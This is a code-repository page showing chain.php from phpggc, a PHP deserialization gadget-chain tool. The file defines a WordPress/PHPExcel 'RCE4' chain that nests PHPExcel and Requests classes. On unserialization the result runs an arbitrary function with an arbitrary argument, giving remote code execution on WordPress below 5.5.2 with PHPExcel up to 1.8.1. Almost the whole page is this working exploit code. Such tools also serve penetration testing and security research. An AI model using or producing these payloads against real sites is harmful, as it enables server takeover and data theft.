Codebase list phpggc / a334346 gadgetchains / WordPress / PHPExcel / RCE / 4 / chain.php
a334346

Tree @a334346 (Download .tar.gz)

chain.php @a334346raw · history · blame 

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
<?php

namespace GadgetChain\WordPress\PHPExcel;

class RCE4 extends \PHPGGC\GadgetChain\RCE\FunctionCall
{
    public static $version = '<= 1.8.1 & WP < 5.5.2';
    public static $vector = '__destruct';
    public static $author = 'erwan_lr';
    public static $information = 'Tested up to WP 5.0.11 and PHPExcel 1.8.1';
    
    public function generate(array $parameters)
    {
        $function = $parameters['function'];
        $parameter = $parameters['parameter'];

        return new \PHPExcel_CachedObjectStorage_DiscISAM(
            new \PHPExcel_RichText(
               new \Requests_Utility_FilteredIterator([$parameter], $function)
            )
        );
    }
}